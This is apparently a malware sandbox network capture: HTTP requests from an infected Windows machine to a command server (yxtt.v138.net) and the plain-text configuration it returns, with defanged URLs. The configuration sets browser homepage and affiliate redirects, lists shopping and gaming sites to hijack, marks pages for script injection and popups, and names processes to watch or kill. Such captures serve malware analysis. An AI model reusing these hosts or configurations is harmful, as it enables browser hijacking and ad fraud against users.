Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 19:05:00 GMT

Content-Length: 147285

Content-Type: text/plain

Last-Modified: Fri, 23 Sep 2016 07:01:44 GMT

Accept-Ranges: bytes

ETag: "f4cbe586815d21:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 chdx113:10 (Cdn Cache Server V2.0), 1.1 jinh95:5 (Cdn Cache Server V2.0)

Connection: keep-alive
.2345mini.com/sogou123/371325^2^hXXp://VVV.v136.net/sy/^^60^^...2345.c
om/?kz00966p^2^hXXp://VVV.v136.net/sy/^^60^^..2kiss.minibu8.com^2^http
://VVV.v136.net/url^^60^^...w1258.com:^2^hXXp://VVV.v136.net/url^^60^^
..j.88817973.cn^2^hXXp://VVV.v136.net/url^^60^^...koolmy.com^2^hXXp://
VVV.v136.net/qp^^60^^...xh0222.com^2^hXXp://VVV.v136.net/qp^^60^^...vi
p45088.com^2^hXXp://VVV.v136.net/qp^^60^^...qvodik.com^2^hXXp://VVV.v1
36.net/qp^^60^^..80.kmay89.com^2^hXXp://VVV.v136.net/qp^^60^^...qy223.
com^2^hXXp://VVV.v136.net/qp^^60^^...67365c.com^2^hXXp://VVV.v136.net/
qp^^60^^...hlfvip2.com^2^hXXp://VVV.v136.net/qp^^60^^...g678929.com^2^
hXXp://VVV.v136.net/qp^^60^^...jkgame1705.com^2^hXXp://VVV.v136.net/qp
^^60^^...2345.com/?kb9999^2^hXXp://VVV.v136.net/sy/^^60^^...2345.com/?
ka00001p^2^hXXp://VVV.v136.net/sy/^^60^^...hao123.com/?tn=95235957_hao
_pg^2^hXXp://VVV.v136.net/sy2/^^60^^..vv.85yi.com^2^hXXp://VVV.v136.ne
t/url^^60^^..aaa.cn8886.com^2^hXXp://VVV.v136.net/url^^60^^..bmw.37gf.
com^2^hXXp://VVV.v136.net/url^^60^^..pm.5zdn.com/31^2^hXXp://VVV.v136.
net/url^^60^^..pc.zc-wan.com^2^hXXp://VVV.v136.net/qp^^60^^..pc.player
zc.com^2^hXXp://VVV.v136.net/qp^^60^^...08098.com^2^hXXp://VVV.v136.ne
t/qp^^60^^...70888n.com^2^hXXp://VVV.v136.net/qp^^60^^...yz900.com^2^h
ttp://VVV.v136.net/qp^^60^^..2345n.sogoulp.com/index16781983_1.html^2^
hXXp://VVV.v136.net/sy/^^60^^..123.sogoulp.com/index16782843_1.html^2^
hXXp://VVV.v136.net/sy/^^60^^...2345.com/?kz00232p^2^hXXp://VVV.v136.n
et/sy/^^60^^...2345.com/?kz00850p^2^hXXp://VVV.v136.net/sy/^^60^^.<<< skipped >>>

GET /send/exitpop.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 17:21:04 GMT

Content-Length: 572

Content-Type: text/plain

Last-Modified: Mon, 01 Feb 2016 14:47:23 GMT

Accept-Ranges: bytes

ETag: "d479c675ff5cd11:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 chdx113:5 (Cdn Cache Server V2.0), 1.1 jinh94:4 (Cdn Cache Server V2.0)

Connection: keep-alive
[push]..time=5..user=..BaiduClose=..RightClose=..QQClose=..HtcClose=..
[email protected]=..Baidu
JcClose=..DhUrl=hXXp://123.sogou.com/?af71105-0003..[pushurl1]..url=ht
tp://VVV.168wm.net/pro/index.htm..[url1]..user=..1=VVV.baidu.com..2=wd
=..3=pn=..ep=1..url=....[url2]..user=..1=hXXp://VVV.sina.com.cn/..ep=1
..url=..[url3]..user=..1=VVV.sogou.com..2=query=..3=page=..ep=1..url=.
...[url4]..user=..1=VVV.17173.com..ep=1..url=....[url5]..user=..1=user
.qzone.qq.com..ep=1..url=..[url6]..user=..1=bbs.yoka.com..ep=1..url=font>....

GET /send/yxjk/yxjpq.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 15:37:47 GMT

Content-Length: 588

Content-Type: text/plain

Last-Modified: Tue, 30 Aug 2016 03:31:31 GMT

Accept-Ranges: bytes

ETag: "44ce4806f2d21:a4e7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)

Connection: keep-alive
hnrwdong*skin_lol/html/[email protected]/client/15v1.html@072008.
[email protected]@110060063@906081@907810@905899@907811@116940004@?
[email protected]@[email protected]@[email protected]@dnf.tga.plu
.cn/[email protected]/htmlcode/227@[email protected]/htm
lcode/218@[email protected]@0045002000001@?m=yw207&sss@?m=yw207&ss
s@?m=tubiao113&sss@[email protected]@[email protected]@
[email protected]@pubwin*.hao123.com@pubwin*.baidu.com@pubwin*sogou
.com@[email protected]@[email protected]@[email protected].
[email protected]@.fookea.com....


GET /send/eb.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 20:08:36 GMT

Content-Length: 13363

Content-Type: text/plain

Last-Modified: Fri, 12 Dec 2014 08:31:01 GMT

Accept-Ranges: bytes

ETag: "f23f69f6e515d01:a55b"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)

Connection: keep-alive
user.qzone.qq.com^17^^10..item.taobao.com^17^^10..favorite.taobao.com^
17^^10..shoucang.taobao.com^17^^10..VVV.taobao.com^17^^10..ju.taobao.c
om^17^^10..taobao.com/search?^17^^10..trade.taobao.com^17^^10...tmall.
com/item.htm^17^^10..list.tmall.com/search^17^^10..VVV.tmall.com^17^^1
0...jd.com^7^^400...7cv.com^7^^400..ctrip.com^7^^400..ctrip.com^7^^400
..7daysinn.cn^7^^400...vip.com^7^^400..pb89.com^7^^400..yougou.com^7^^
400..nuomi.com^7^^400..xiangshe.com^7^^400..xiangguo.tv^7^^400..blzoom
.com^7^^400..paixie.net^7^^400...lovo.cn^7^^400..wangjiu.com^7^^400..t
iantian.com^7^^400..mbaobao.com^7^^400..aizhigu.com.cn^7^^400..redbaby
.suning.com^7^^400..keede.com^7^^400..bookschina.com^7^^400..dangdang.
com^7^^400..dhc.net.cn^7^^400..winxuan.com^7^^400..lefeng.com^7^^400..
.no5.com.cn^7^^400...jxdyf.com^7^^400...d1.com.cn^7^^400...newegg.cn^7
^^400...xiu.com^7^^400...leyou.com.cn^7^^400...yidianda.com^7^^400...c
hina-pub.com^7^^400...x.com.cn^7^^400...yhd.com^7^^400...quwan.com^7^^
400...masamaso.com^7^^400...yohobuy.com^7^^400...vip.com^7^^400...wine
nice.com^7^^400...yesmywine.com^7^^400...chunshuitang.com^7^^400...vsi
go.cn^7^^400...womai.com^7^^400...s.cn^7^^400...lamiu.com^7^^400..beif
abook.com^7^^400...pb89.com^7^^400...m18.com^7^^400...oohdear.com^7^^4
00...yixun.com^7^^400...happigo.com^7^^400...tiantian.com^7^^400...jus
tyle.com^7^^400...suning.com^7^^400..muyingzhijia.com^7^^400...hecha.c
n^7^^400...e-lining.com^7^^400..xifuquan.com^7^^400..paixie.net^7^^400
..vjia.com^7^^400..lusen.com^7^^400..chris-tina.com^7^^400..shangp<<< skipped >>>

GET /send/yxjk/jzyxj.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 14:38:20 GMT

Content-Length: 8416

Content-Type: text/plain

Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT

Accept-Ranges: bytes

ETag: "48afbf2c0eed11:a470"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)

Connection: keep-alive
dev.tg.wan.360.cn^^^800002..360tg.6711.com^^^800002..g.b.twyxi.com^^^8
00002...i5399.com^^^800002..g.6gh4.com^^^800002..tg.xylhgw.com^^^80000
2..g.s8dj.com^^^800002..t.xydhl.com^^^800002..t.cyuew.com^^^800002..*.
.........^^^800002...13resy.com^^^800002...luxi0891.com^^^800002...wyw
gx.com^^^800002...5p0n.com^^^800002..bai880.9ok2016.com^^^800002..bai6
60.android882.com^^^800002...51korean.com^^^800002...a3t6.cn/08^^^8000
02..183.61.162.85^^^800002...3gg.com^^^800002...926aasf.com^^^800002..
.kkkggg.cn^^^800002..70803344.com^^^800002...g5h5.com/bd^^^800002..cls
.d54p.com^^^800002...52sf-lsi.com^^^800002...myfirstweb.cn^^^800002..1
83.61.162.86^^^800002...hgjg12.com^^^800002...woaisf2016.com^^^800002.
..haha2016.com^^^800002..qo8.m3b3.com^^^800002..zd.91913.cn^^^800002..
VVV.zhaocs.com^^^800002..bai123.q77169.com^^^800002...888ppk.cn^^^8000
02...7lph.com^^^800002..4gfbf.jghr11.com^^^800002...futusff8.com^^^800
002..bai330.tel2016.com^^^800002...qubasfkf.com^^^800002...asf.baidu1.
com^^^800002..4fvrh.11vfsa.com^^^800002..info.yitsoftware.com^^^800002
...12hjfrg.com^^^800002..6ag.3loz.com^^^800002...sjh520.com^^^800002..
VVV.uc48.com/08^^^800002..*..........^^^800002..*....1.76^^^800002..*.
.........^^^800002..*..........^^^800002..*........^^^800002..g.b28g.c
om^^^800002..VVV.4399.com^^^800002..wan.sogou.com/^^^800002..tg.51.com
^^^800002..g.fd4f.com^^^800002..g.b28g.com^^^800002..sx.juygj.com^^^80
0002..*....PK^^^800002..*......boss^^^800002..*..........^^^800002..*8
0......^^^800002..*........^^^800002..*............^^^800002..*...<<< skipped >>>

GET /send/tfgg.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 17:21:04 GMT

Content-Length: 454

Content-Type: text/plain

Last-Modified: Tue, 22 Mar 2016 02:15:19 GMT

Accept-Ranges: bytes

ETag: "144bbaaee083d11:a404"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)

Connection: keep-alive

placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlcode/227..placeid=
227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.duoqu.com/lt.htm
l__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.tv/burning?chan=2
8..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..hXXp://VVV.game485
.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agrt.html?id=153521
&p=i..907046..907811..906081..907810..120435..xuanchuanyiunion.cpm..fz
cg.zhengheinc.com..90360772_hao_pgHTTP/1.1 200 OK..Date: Sat, 24 Sep 2
016 17:21:04 GMT..Content-Length: 454..Content-Type: text/plain..Last-
Modified: Tue, 22 Mar 2016 02:15:19 GMT..Accept-Ranges: bytes..ETag: "
144bbaaee083d11:a404"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NE
T..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jinh93:8103 (
Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)..Connecti
on: keep-alive..placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlco
de/227..placeid=227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.
duoqu.com/lt.html__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.t
v/burning?chan=28..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..ht
tp://VVV.game485.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agr
t.html?id=153521&p=i..907046..907811..906081..907810..120435..xuanchua
nyiunion.cpm..fzcg.zhengheinc.com..90360772_hao_pg....

<<< skipped >>>

GET /send/prosafe.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 15:28:17 GMT

Content-Length: 845

Content-Type: text/plain

Last-Modified: Thu, 11 Aug 2016 03:19:29 GMT

Accept-Ranges: bytes

ETag: "c8f02e2c7ff3d11:a470"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)

Connection: keep-alive
hintplugin.exe@*[email protected]@[email protected]@rwyc
[email protected]@[email protected]@*clsmn.exe@gamelauncher
[email protected]@[email protected]@*coobarclt.exe@*crossf
ire.exe@\................\@\......\hqg.exe@\[email protected]@lt
[email protected]......@\xmp\program\xpm.exe@\pstyle\qyclient.ex
e@\........2......\@\..............\launcher\[email protected]@jkn
[email protected]@........\....\autoupdate.exe@\........\cqby.exe@
[email protected]@\........\qkwebgamelogin.exe@\debug\explorer.ex
e@whclient\whwindow.exe@\....\[email protected]@*\tk
lobby.exe@\tkwebapp.exe@\tkcltnet.exe@\tkassistor.exe@\tklobby.exe@\jj
game\@\JJ......\@\gamemenu\[email protected]@*temp\temp\system.exe@*\
Temp\Temp\@[email protected]@[email protected]@\........\@xy2_launc
h.exe....


GET /send/addjs/jslist.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 13:30:20 GMT

Content-Length: 7956

Content-Type: text/plain

Last-Modified: Mon, 05 Sep 2016 01:23:27 GMT

Accept-Ranges: bytes

ETag: "f6816a1a147d21:a4e7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:3 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)

Connection: keep-alive
.xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..xieguotou.com^^^
hzuser@servce@hnrw@wskh^0^ietc.js...zhainandao.com^^^hzuser@servce@hnr
w@wskh^0^ietc.js...mm131.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...lao
nanren.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...laogedaojie.com^^^hzu
ser@servce@hnrw@wskh^0^ietc.js...colorbird.com^^^hzuser@servce@hnrw@ws
kh^0^ietc.js...5442.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...52kkm.or
g^^^hzuser@servce@hnrw@wskh^0^ietc.js...169bb.com^^^hzuser@servce@hnrw
@wskh^0^ietc.js..m.neihancun.net^^^hzuser@servce@hnrw@wskh^0^ietc.js..
.xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..rb.yesemn.com^^^
hzuser@servce@hnrw@wskh^0^ietc.js...5442.com^^^hzuser@servce@hnrw@wskh
^0^ietc.js...xmeise.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...xieedang
123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...ik123.com^^^hzuser@servc
e@hnrw@wskh^0^ietc.js...a4yy.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..
tuku.nvsay.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..static.yungengxin.
com^^^hzuser@servce@hnrw@wskh^0^ietc.js..mp.weixin.qq.com/s?^^^hzuser@
servce@hnrw@wskh^0^ietc.js..pubapi.yungengxin.com^^^hzuser@servce@hnrw
@wskh^0^ietc.js..VVV.yy6080.tv^^^hzuser@servce@hnrw@wskh^0^ietc.js..ww
w.yy6080.org^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.dytt8.net^^^hzus
er@servce@hnrw@wskh^0^ietc.js..VVV.80s.cn^^^hzuser@servce@hnrw@wskh^0^
ietc.js..qqsix.com.cn^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.qzone52
0.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.iqshw.com^^^hzuser@serv
ce@hnrw@wskh^0^ietc.js..mm.xmeise.com^^^hzuser@servce@hnrw@wskh^0^<<< skipped >>>

GET /send/jzjc/jzjc.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 17:21:04 GMT

Content-Length: 154

Content-Type: text/plain

Last-Modified: Thu, 25 Feb 2016 08:27:14 GMT

Accept-Ranges: bytes

ETag: "a2b9ca54a66fd11:a413"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:8104 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)

Connection: keep-alive
tgp_render.exe^..gamelauncher.exe^..\qq.exe^..runme.exe^..clsmn.exe^..
wxlltaidex.exe^..pubwinclient.exe^..svchost.exe^..jknbmsnew.exe^..barb
lientview.exe^....


GET /send/jzjc/jzurl.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 17:21:04 GMT

Content-Length: 1224

Content-Type: text/plain

Last-Modified: Tue, 01 Mar 2016 02:42:45 GMT

Accept-Ranges: bytes

ETag: "42ecb986473d11:a404"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh92:8080 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)

Connection: keep-alive
^^.16mncr5.cn/2016/^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.xl
mqt.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.vs858.com^http
://VVV.168wm.net/jzurljc/index.htm^3^10..^^p.m5bn.com/1/1265.html?uid=
3252^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.1x3x.com/z/bin056
gjsg2ico26^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.jielesh.com
^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^up.zhuiqu.com/html^htt
p://VVV.168wm.net/jzurljc/index.htm^3^10..^^t2.e719.net/g_20140331.asp
?u^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^news.a9377j.com/1869
/?gid^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^w.lj139.com/dxt/2
1417^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^11.800tx.com^http:
//VVV.168wm.net/jzurljc/index.htm^3^10..^^bdtg.37wanyy.cn/s/1/1317/449
85.html?uid=2390762^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^g.6
sfg.com/s/1/999/33990.html?uid=507162^hXXp://VVV.168wm.net/jzurljc/ind
ex.htm^3^10..^^121.40.32.124:^hXXp://VVV.168wm.net/jzurljc/index.htm^3
^10..^^777sf.ykski.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^
p.pp1o.com/s/1/1222/39228.html?uid=908833^hXXp://VVV.168wm.net/jzurljc
/index.htm^3^10..^^p.pp1o.com/s/1/1222/32215.html?uid=906636^hXXp://ww
w.168wm.net/jzurljc/index.htm^3^10....
<<< skipped >>>

GET /send/newDomain.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 15:23:19 GMT

Content-Length: 21

Content-Type: text/plain

Last-Modified: Fri, 24 Jun 2016 03:06:00 GMT

Accept-Ranges: bytes

ETag: "10baa56c5cdd11:a55b"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh93:1 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)

Connection: keep-alive

hXXp://VVV.yaojyw.netHTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 15:23:19 
GMT..Content-Length: 21..Content-Type: text/plain..Last-Modified: Fri,
 24 Jun 2016 03:06:00 GMT..Accept-Ranges: bytes..ETag: "10baa56c5cdd11
:a55b"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Ca
che: HIT from cache.51cdn.com..X-Via: 1.1 jinh93:1 (Cdn Cache Server V
2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)..Connection: keep-alive..ht
tp://VVV.yaojyw.net....

GET /send/jwico.txt HTTP/1.1

User-Agent: RookIE/1.0

Host: yxtt.v138.net


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 17:21:04 GMT

Content-Length: 47

Content-Type: text/plain

Last-Modified: Wed, 07 Jan 2015 05:43:26 GMT

Accept-Ranges: bytes

ETag: "689c5fdb3c2ad01:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jinh94:5 (Cdn Cache Server V2.0)

Connection: keep-alive

@fyww@tlww@jingwang1@jingwang2@jingwang3@ahhfjwHTTP/1.1 200 OK..Date: 
Sat, 24 Sep 2016 17:21:04 GMT..Content-Length: 47..Content-Type: text/
plain..Last-Modified: Wed, 07 Jan 2015 05:43:26 GMT..Accept-Ranges: by
tes..ETag: "689c5fdb3c2ad01:a652"..Server: Microsoft-IIS/6.0..X-Powere
d-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 c
hengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jinh94:5 (Cdn Cache Serv
er V2.0)..Connection: keep-alive..@fyww@tlww@jingwang1@jingwang2@jingw
ang3@ahhfjw....

GET /send/InsertWnd.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 15:45:23 GMT

Content-Length: 2402

Content-Type: text/plain

Last-Modified: Tue, 30 Aug 2016 03:33:23 GMT

Accept-Ranges: bytes

ETag: "a6b73c436f2d21:a4e7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)

Connection: keep-alive
*browser..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://yxtt.v138.net/send/yxjtc
/iframeyxjlove.htm..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_Wid
getWin_0..2^BRMainFrameGUI..2^MozillaWindowClass..2^Maxthon3Cls_MainFr
m..2^QQBrowser_WidgetWin_0..3^........3^................3^........3^..
................ ..3^..........3^..........3^............3^yswm..3^...
.......3^485......4^1000^600..5^1..*browserTitle..1^5^40^7^320^270^0^0
^300^250^hXXp://yxtt.v138.net/send/yxjtc/ace.htm..2^360se6_Frame..2^Ch
rome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cl
s_MainFrm..2^MozillaWindowClass..2^QQBrowser_WidgetWin_0..4^1000^700..
5^1..*browserVideo..1^820^220^5^215^308^0^0^195^288^hXXp://VVV.168wm.n
et/sp/t2345.asp?mdstr=..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome
_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cls_MainFrm..2^MozillaWindow
Class..2^QQBrowser_WidgetWin_0..2^IEFrame..3^..........3^..........4^1
000^700..5^1..7^..........7^..........7^......7^soso..7^......7^......
....*qq..1^-13^49^6^220^60^0^0^200^40^hXXp://123.1313k.net/send/yxjtc/
qqtdb.htm..2^TXGuiFoundation..3^QQ..3^..........3^............3^......
........3^......3^......3^..........3^............3^..........3^......
3^..........3^..........3^..........3^....Q......3^..........3^...<<< skipped >>>

GET /send/yxjk/jzyxj.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 14:38:20 GMT

Content-Length: 8416

Content-Type: text/plain

Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT

Accept-Ranges: bytes

ETag: "48afbf2c0eed11:a470"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)

Connection: keep-alive
dev.tg.wan.360.cn^^^800002..360tg.6711.com^^^800002..g.b.twyxi.com^^^8
00002...i5399.com^^^800002..g.6gh4.com^^^800002..tg.xylhgw.com^^^80000
2..g.s8dj.com^^^800002..t.xydhl.com^^^800002..t.cyuew.com^^^800002..*.
.........^^^800002...13resy.com^^^800002...luxi0891.com^^^800002...wyw
gx.com^^^800002...5p0n.com^^^800002..bai880.9ok2016.com^^^800002..bai6
60.android882.com^^^800002...51korean.com^^^800002...a3t6.cn/08^^^8000
02..183.61.162.85^^^800002...3gg.com^^^800002...926aasf.com^^^800002..
.kkkggg.cn^^^800002..70803344.com^^^800002...g5h5.com/bd^^^800002..cls
.d54p.com^^^800002...52sf-lsi.com^^^800002...myfirstweb.cn^^^800002..1
83.61.162.86^^^800002...hgjg12.com^^^800002...woaisf2016.com^^^800002.
..haha2016.com^^^800002..qo8.m3b3.com^^^800002..zd.91913.cn^^^800002..
VVV.zhaocs.com^^^800002..bai123.q77169.com^^^800002...888ppk.cn^^^8000
02...7lph.com^^^800002..4gfbf.jghr11.com^^^800002...futusff8.com^^^800
002..bai330.tel2016.com^^^800002...qubasfkf.com^^^800002...asf.baidu1.
com^^^800002..4fvrh.11vfsa.com^^^800002..info.yitsoftware.com^^^800002
...12hjfrg.com^^^800002..6ag.3loz.com^^^800002...sjh520.com^^^800002..
VVV.uc48.com/08^^^800002..*..........^^^800002..*....1.76^^^800002..*.
.........^^^800002..*..........^^^800002..*........^^^800002..g.b28g.c
om^^^800002..VVV.4399.com^^^800002..wan.sogou.com/^^^800002..tg.51.com
^^^800002..g.fd4f.com^^^800002..g.b28g.com^^^800002..sx.juygj.com^^^80
0002..*....PK^^^800002..*......boss^^^800002..*..........^^^800002..*8
0......^^^800002..*........^^^800002..*............^^^800002..*...<<< skipped >>>

